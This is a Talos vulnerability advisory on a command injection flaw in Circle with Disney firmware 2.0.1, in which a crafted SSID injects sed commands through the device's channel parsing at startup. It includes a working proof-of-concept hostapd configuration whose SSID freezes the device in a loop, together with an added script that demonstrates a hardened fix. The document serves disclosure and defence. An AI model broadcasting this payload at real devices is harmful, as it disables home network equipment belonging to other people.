Talos Vulnerability Report

TALOS-2017-0446

Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability

October 31, 2017
CVE Number

CVE-2017-12094

Summary

An exploitable vulnerability exists in the WiFi channel parsing of Circle with Disney running firmware 2.0.1. A specially crafted SSID can cause the device to execute arbitrary sed commands. An attacker needs to set up an access point reachable by the device to trigger this vulnerability.

Tested Versions

Circle with Disney 2.0.1

Product URLs

https://meetcircle.com/

CVSSv3 Score

7.4 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

Details

Circle with Disney is a network device used to monitor internet use of children on a given network.

At the end of the boot process, the script "/mnt/shares/usr/bin/startcircle" is executed. The script configures NTP, network interfaces, firewall rules and starts cronjobs.

Part of the script configures an Access Point, which is only needed for the initial configuration of the device.

...
# [1]
$DIR/scripts/aplist_create.sh

# [2]
best_ch=`awk 'BEGIN{max=-1000;} /Channel:/{ch=$4} /Signal/{s=$2+0; if (s>max){ max=s; maxch=ch}} END{print maxch}' /tmp/ap_list.out`

[ "x$best_ch" != "x" ] && {
        echo $best_ch > /tmp/current_channel

        # [3]
        sed -i "s/channel=.*/channel=$best_ch/g" /tmp/hostapd.conf
}
...

At [1] the script calls aplist_create.sh, which has the following contents:

#!/bin/sh
ifconfig ra0 up
iwinfo ra0 scan > /tmp/ap_list.out      # [4]

`iwinfo` [4] prints a list of the Access Points detected by `ra0`; each entry has the following form:

Cell 01 - Address: 11:22:33:44:55:66
          ESSID: "valid-ssid"
          Mode: Master  Channel: 1
          Signal: -22 dBm  Quality: 70/70
          Encryption: WPA2 PSK (CCMP)

Once "ap_list.out" has been created at [1], the startup script selects the channel of the Access Point with the strongest signal. The channel is extracted as a string by awk, using its default (whitespace) field separators [2].

Finally at [3] the channel is used in a sed substitution command, without any sanitization.

An SSID field in an 802.11 frame has a maximum length of 32 bytes and can contain any character. Moreover, iwinfo prints the characters found in the SSID without escaping them. This means that an attacker may use an SSID containing newline characters to add arbitrary lines to the iwinfo output.

This allows an attacker to control the channel string returned by awk, which gets passed to sed at [3].

Exploit Proof-of-Concept

The following proof of concept shows how to freeze the box on startup by broadcasting a specific SSID. The box will need manual power-cycling to boot again.

$ cat << 'EOF' > hostapd.conf
interface=wlan0
channel=1
ssid2=P"Channel: x /;:x/g;bx #Signal"
EOF
$ hostapd -B ./hostapd.conf

The SSID above ends up inside the sed substitution command. In the iwinfo output, the line `ESSID: "Channel: x /;:x/g;bx #Signal"` matches the awk rule for "Channel:", so its fourth field, `/;:x/g;bx`, becomes the channel string; the same line also matches "Signal", and its second field (`"Channel:`) converts to the numeric value 0, which beats the negative dBm readings of every real Access Point, so this string is the one selected. Since semicolons are not escaped, they can be used to inject new sed commands.

In this example the injection creates an infinite loop by defining a label named "x/g" and jumping to it with "bx/g" (the trailing "/g" is appended by Circle's script at [3]), so the script that sed actually runs is `s/channel=.*/channel=/;:x/g;bx/g`.
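The following script is an added example and is not code from the Circle firmware or from the Talos advisory. It replays the awk channel selection from startcircle [2] on a constructed iwinfo scan dump that contains the PoC SSID, shows the sed script that [3] would build from the result, and places a hardened selection and a validated channel check beside it. The scan text, file names and channel range are assumptions made for the example.

```shell
#!/bin/sh
# Added example (not Circle firmware or Talos code): the awk channel
# selection from startcircle, replayed on a constructed iwinfo scan dump,
# next to a hardened selection and a validated sed step. File names and
# the scan text are constructed for the example.

# Constructed stand-in for "iwinfo ra0 scan > /tmp/ap_list.out": one honest
# AP on channel 6 and one AP broadcasting the advisory's PoC SSID.
sample_scan() {
cat <<'EOF'
Cell 01 - Address: 11:22:33:44:55:66
          ESSID: "valid-ssid"
          Mode: Master  Channel: 6
          Signal: -22 dBm  Quality: 70/70
          Encryption: WPA2 PSK (CCMP)
Cell 02 - Address: 66:55:44:33:22:11
          ESSID: "Channel: x /;:x/g;bx #Signal"
          Mode: Master  Channel: 11
          Signal: -80 dBm  Quality: 20/70
          Encryption: none
EOF
}

# The awk program from startcircle [2], unchanged, reading a scan dump on stdin.
# The ESSID line of Cell 02 matches /Channel:/ (so $4, the payload, becomes ch)
# and /Signal/ ("\"Channel:"+0 evaluates to 0, beating every real dBm reading).
vulnerable_best_ch() {
    awk 'BEGIN{max=-1000;} /Channel:/{ch=$4} /Signal/{s=$2+0; if (s>max){ max=s; maxch=ch}} END{print maxch}'
}

# Hardened selection: anchor on the exact "Mode: ... Channel: N" and
# "Signal: -N dBm" lines iwinfo emits, and accept only digits as a channel.
safe_best_ch() {
    awk 'BEGIN{max=-1000}
         /^ *Mode: .*Channel: [0-9]+$/ {ch=$NF}
         /^ *Signal: -?[0-9]+ dBm/     {s=$2+0; if (s>max){max=s; maxch=ch}}
         END{print maxch}'
}

# The sed script that [3] builds around the channel string; shown, not run,
# because with the PoC payload it loops forever.
sed_script() {
    printf 's/channel=.*/channel=%s/g\n' "$1"
}

# Validated replacement for [3]: refuse anything that is not a 2.4 GHz
# channel number (assumed range 1-14) before it can reach sed, and write
# through a temporary file instead of "sed -i" for portability.
apply_channel() {
    ch=$1; conf=$2
    case "$ch" in
        ''|*[!0-9]*) echo "refusing non-numeric channel: $ch" >&2; return 1 ;;
    esac
    if [ "$ch" -lt 1 ] || [ "$ch" -gt 14 ]; then
        echo "channel out of range: $ch" >&2; return 1
    fi
    sed "s/^channel=.*/channel=$ch/" "$conf" > "$conf.tmp" && mv "$conf.tmp" "$conf"
}

# Demonstration on the constructed scan dump.
echo "startcircle awk picks   : $(sample_scan | vulnerable_best_ch)"
echo "hardened awk picks      : $(sample_scan | safe_best_ch)"
echo "sed script [3] would run: $(sed_script "$(sample_scan | vulnerable_best_ch)")"
```

The hardened awk still reads attacker-influenced text, so an SSID carrying newlines could at most smuggle in a well-formed "Channel: N" line and steer the device to another valid channel; the numeric check in apply_channel is what keeps the value from ever being interpreted as sed syntax.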

Timeline

2017-09-20 - Vendor Disclosure
2017-10-31 - Public Release

Credit

Discovered by Claudio Bozzato and Lilith Wyatt <(^_^)> of Cisco Talos.